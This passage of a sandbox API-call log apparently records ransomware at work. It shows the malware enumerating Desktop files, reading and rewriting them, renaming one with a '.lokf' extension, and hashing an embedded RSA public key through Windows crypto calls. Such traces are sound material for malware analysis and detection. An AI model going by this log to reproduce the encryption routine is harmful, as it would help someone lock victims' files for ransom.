dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.537] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.537] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.537] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0058.537] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0058.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0058.537] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0058.537] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.537] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0058.537] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0058.537] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0058.537] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.537] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.537] CloseHandle (hObject=0x5cc) returned 1 [0058.538] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269478 [0058.538] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x870) returned 0x3268798 [0058.538] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269478 | out: hHeap=0x660000) returned 1 [0058.538] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cxkxIuDq.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cxkxiudq.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cxkxIuDq.m4a.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cxkxiudq.m4a.lokf")) returned 1 [0058.539] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.539] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.539] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.540] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3289860 | out: hHeap=0x660000) returned 1 [0058.540] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0058.540] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.540] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.540] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0058.540] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned=".ini" [0058.540] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3289860 | out: hHeap=0x660000) returned 1 [0058.540] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x557a36c0, ftCreationTime.dwHighDateTime=0x1d4d2ea, ftLastAccessTime.dwLowDateTime=0xcaaf2bb0, ftLastAccessTime.dwHighDateTime=0x1d4d54e, ftLastWriteTime.dwLowDateTime=0xcaaf2bb0, ftLastWriteTime.dwHighDateTime=0x1d4d54e, nFileSizeHigh=0x0, nFileSizeLow=0x5826, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="faub8t.flv", cAlternateFileName="")) returned 1 [0058.540] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.540] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.540] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0058.540] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\faub8t.flv") returned=".flv" [0058.540] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\faub8t.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\faub8t.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.540] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=22566) returned 1 [0058.540] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.542] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5800, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.542] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.543] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.543] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.543] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.543] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x5826, lpOverlapped=0x0) returned 1 [0058.543] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.543] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.543] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.543] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.543] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.544] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.544] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.544] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.544] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.544] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.544] GetLastError () returned 0x0 [0058.544] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.544] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.544] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.544] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.544] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.544] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.545] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.545] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x5830) returned 0x9c82710 [0058.545] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0058.545] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0058.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0058.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0058.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298cc8 [0058.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ae78 [0058.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298de8 [0058.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ae90 [0058.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6aec0 [0058.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6aed8 [0058.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0058.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0058.545] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.545] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6aec0 | out: hHeap=0x660000) returned 1 [0058.545] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6aed8 | out: hHeap=0x660000) returned 1 [0058.545] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.545] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0058.545] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0058.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6aed8 [0058.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0058.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6aec0 [0058.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0058.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0058.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0058.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0058.546] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0058.546] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0058.546] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0058.546] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0058.546] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.546] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6aed8 | out: hHeap=0x660000) returned 1 [0058.546] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.546] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6aec0 | out: hHeap=0x660000) returned 1 [0058.546] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0058.546] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0058.546] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.546] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.546] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0058.546] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0058.546] GetCurrentThreadId () returned 0x9e0 [0058.546] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326a688 [0058.546] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x6c2f60 [0058.546] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0058.546] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.546] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0058.546] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0058.546] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.546] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3234418 [0058.546] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.546] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.546] GetCurrentThreadId () returned 0x9e0 [0058.546] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.546] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.546] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0058.546] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.546] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.546] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.546] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.546] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0058.546] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3292fe8 [0058.546] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0058.546] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261058 [0058.546] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0058.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3282810 [0058.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.547] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0058.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0058.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0058.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0058.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0058.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0058.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6aec0 [0058.547] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0058.547] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0058.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0058.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0058.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6aed8 [0058.547] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0058.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0058.547] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0058.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6aea8 [0058.547] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0058.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ad10 [0058.547] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0058.547] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0058.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0058.547] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0058.547] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0058.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6aef0 [0058.547] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6acc8 [0058.547] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0058.548] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0058.548] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0058.548] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0058.548] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0058.548] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0058.548] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6aec0 | out: hHeap=0x660000) returned 1 [0058.548] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6aec0 [0058.548] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.548] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0058.548] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.548] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0058.548] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.548] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x32947b0 [0058.548] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.548] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3296fa8 [0058.548] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0058.548] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0058.548] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6aec0 | out: hHeap=0x660000) returned 1 [0058.548] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32949c8 [0058.548] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0058.548] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x32679f8 [0058.548] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.548] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a50 | out: hHeap=0x660000) returned 1 [0058.548] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3292fe8 | out: hHeap=0x660000) returned 1 [0058.548] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32679f8 | out: hHeap=0x660000) returned 1 [0058.548] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0058.548] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0058.548] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.548] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32949c8 | out: hHeap=0x660000) returned 1 [0058.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296fa8 | out: hHeap=0x660000) returned 1 [0058.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0058.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6aef0 | out: hHeap=0x660000) returned 1 [0058.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0058.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6aed8 | out: hHeap=0x660000) returned 1 [0058.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6aea8 | out: hHeap=0x660000) returned 1 [0058.549] HeapFree (in: 